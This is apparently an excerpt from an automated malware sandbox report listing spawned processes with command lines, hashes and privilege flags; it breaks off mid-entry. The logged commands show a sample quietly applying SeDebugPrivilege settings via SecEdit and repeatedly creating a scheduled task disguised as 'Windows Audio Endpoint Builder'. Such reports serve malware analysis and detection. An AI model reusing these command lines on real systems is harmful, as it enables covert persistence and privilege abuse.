                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:48
                                                                                                                  Start time:10:09:51
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:49
                                                                                                                  Start time:10:09:51
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:50
                                                                                                                  Start time:10:09:52
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:51
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:52
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:53
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:54
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:55
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:56
                                                                                                                  Start time:10:09:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:57
                                                                                                                  Start time:10:09:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:58
                                                                                                                  Start time:10:09:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:59
                                                                                                                  Start time:10:09:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:60
                                                                                                                  Start time:10:10:00
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:61
                                                                                                                  Start time:10:10:05
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:62
                                                                                                                  Start time:10:10:05
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:63
                                                                                                                  Start time:10:10:05
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:64
                                                                                                                  Start time:10:10:06
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:65
                                                                                                                  Start time:10:10:06
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:66
                                                                                                                  Start time:10:10:11
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:67
                                                                                                                  Start time:10:10:11
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:68
                                                                                                                  Start time:10:10:12
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:69
                                                                                                                  Start time:10:10:12
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:70
                                                                                                                  Start time:10:10:12
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:71
                                                                                                                  Start time:10:10:17
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:72
                                                                                                                  Start time:10:10:17
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:73
                                                                                                                  Start time:10:10:18
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:74
                                                                                                                  Start time:10:10:18
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:75
                                                                                                                  Start time:10:10:18
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:76
                                                                                                                  Start time:10:10:23
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:77
                                                                                                                  Start time:10:10:23
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:78
                                                                                                                  Start time:10:10:24
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:79
                                                                                                                  Start time:10:10:24
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:80
                                                                                                                  Start time:10:10:24
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:81
                                                                                                                  Start time:10:10:29
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:82
                                                                                                                  Start time:10:10:29
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:83
                                                                                                                  Start time:10:10:30
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:84
                                                                                                                  Start time:10:10:31
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:85
                                                                                                                  Start time:10:10:31
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:86
                                                                                                                  Start time:10:10:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:87
                                                                                                                  Start time:10:10:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:88
                                                                                                                  Start time:10:10:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:89
                                                                                                                  Start time:10:10:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:90
                                                                                                                  Start time:10:10:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:91
                                                                                                                  Start time:10:10:40
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
